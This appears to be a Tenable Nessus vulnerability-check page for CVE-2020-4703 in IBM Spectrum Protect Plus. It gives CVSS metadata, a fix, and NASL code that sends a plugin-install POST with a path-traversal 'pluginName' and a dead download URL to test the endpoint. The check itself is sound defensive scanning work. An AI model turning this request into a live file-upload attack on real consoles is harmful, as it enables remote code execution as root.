
IBM Spectrum Protect Plus File Upload RCE

2020-10-15 00:00:00
This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.

6 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:P/I:P/A:P

8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

0.002 Low

EPSS

Percentile

59.3%

The IBM Spectrum Protect Plus (SPP) administrative console running on the remote host is affected by a remote code execution vulnerability because it allows remote installation of console plugins. An unauthenticated, remote attacker can exploit this together with CVE-2020-4711, via specially crafted HTTP requests, to execute arbitrary code on the system with root privileges.

Note that the application is reportedly affected by other vulnerabilities; however, this plugin has not tested for those issues.

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

# Plugin registration: report metadata (ids, scores, dates, text) and the
# launch prerequisites (dependency plugin, KB keys, ports).  Nessus runs
# this branch once at load time; the detection logic below never runs here.
if (description)
{
  script_id(141471);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/10/16");

  script_cve_id("CVE-2020-4703");
  # Tenable Research Advisory for the same issue.
  script_xref(name:"TRA", value:"TRA-2020-54");

  script_name(english:"IBM Spectrum Protect Plus File Upload RCE");

  script_set_attribute(attribute:"synopsis", value:
"A web application running on the remote host is affected by a
remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The IBM Spectrum Protect Plus (SPP) administrative console running
on the remote host is affected by a remote code execution
vulnerability due to the fact that it allows remote installation of
console plugins. An unauthenticated, remote attacker can exploit
this and CVE-2020-4711 together, via specially crafted HTTP requests, 
to execute arbitrary code on the system with root privileges.

Note that the application is reportedly affected by other
vulnerabilities; however, this plugin has not tested for those issues.");
  script_set_attribute(attribute:"see_also", value:"https://www.ibm.com/support/pages/node/6328867");
  # The fix is a package-level update of the console RPM, not a whole
  # product upgrade; the build number is given so admins can verify it.
  script_set_attribute(attribute:"solution", value:
"Update the IBM Spectrum Protect Plus RPM package spp-adminconsole to
10.1.6-27 or later. That spp-adminconsole package should be in the IBM
Spectrum Protect Plus 10.1.6 build 2045.");
  # Scores are assigned by hand (cvss_score_source "manual") rather than
  # copied from the CVE record: the rationale below cites an unauthenticated
  # root RCE, which is why the base vectors carry Au:N (CVSS2) and
  # PR:N/UI:N (CVSS3).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"manual");
  script_set_attribute(attribute:"cvss_score_rationale", value:"PoC demonstrates unauthenticated RCE as root.");

  # NOTE(review): the rationale above refers to a PoC while this attribute
  # states no known exploits; confirm which is intended.
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/09/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/09/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/10/15");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:spectrum_protect_plus");
  script_end_attributes();

  # The check below actively POSTs to the vulnerable endpoint, hence the
  # ACT_ATTACK phase rather than a passive/gather category.
  script_category(ACT_ATTACK);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Only run once the admin console has been fingerprinted; 8090 is the
  # same default used for get_http_port() in the detection code.
  script_dependencies("ibm_spp_admin_console_detect.nbin");
  script_require_keys("installed_sw/IBM Spectrum Protect Plus Administrative Console");
  script_require_ports("Services/www", 8090);

  exit(0);
}

include('http.inc');
include('webapp_func.inc');

app = "IBM Spectrum Protect Plus Administrative Console";

# Two gates before anything is sent: the console must have been
# fingerprinted somewhere on the host, and it must be the service on the
# HTTP port currently being scanned (default 8090).  Each helper audits
# and exits on its own when its condition is not met.
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:8090, ignore_broken:TRUE);
get_single_install(app_name:app, port:port);

url = "/api/plugin/?action=install_single";

# The console fetches "url" itself and would store the result as
# /opt/adminconsole/plugins/<pluginName>/<filename>.  Using a URL that is
# expected to be dead (a random, non-existent name on localhost:12345 of
# the target) makes that download fail, so nothing is ever written on the
# remote host; the check only needs the endpoint to accept the request.
filename = "no_such_file_" + rand_str(length:8);
download_url = "http://localhost:12345/" + filename;

# JSON body of the install request: source URL, target file name,
# install type, and the plugin folder (with traversal towards /tmp).
data =
  '{"url": "' + download_url + '",' +
  '"filename": "' + filename + '",' +
  '"type": "FILE",' +
  '"pluginName": "emi/../../../../../tmp"}';

# A vulnerable console tries the download before replying, so a dead URL
# can make the answer slow; make sure we wait at least 20 seconds.
if (http_get_read_timeout() < 20) http_set_read_timeout(20);

res = http_send_recv3(
  port         : port,
  method       : "POST",
  item         : url,
  data         : data,
  content_type : "application/json",
  exit_on_fail : TRUE
);
status = res[0];

# Patched builds dropped POST support on /api/plugin and answer
# 501 Not Implemented.  audit() exits, so each verdict ends the script.
if (" 501 " >< status) audit(AUDIT_LISTEN_NOT_VULN, app, port);

# Any status other than 200 is inconclusive.
if (" 200 " >!< status)
  audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected HTTP response status ' + chomp(status));

# 200: the request was processed.  No file landed on disk because the
# download from the dead URL failed and the plugin install therefore failed.
report = 'Nessus was able to detect the issue by sending the' +
  ' following HTTP request to the remote host : \n\n' +
  http_last_sent_request();

security_report_v4(
  port     : port,
  severity : SECURITY_HOLE,
  extra    : report
);
Vendor: ibm — Product: spectrum_protect_plus — CPE: cpe:/a:ibm:spectrum_protect_plus
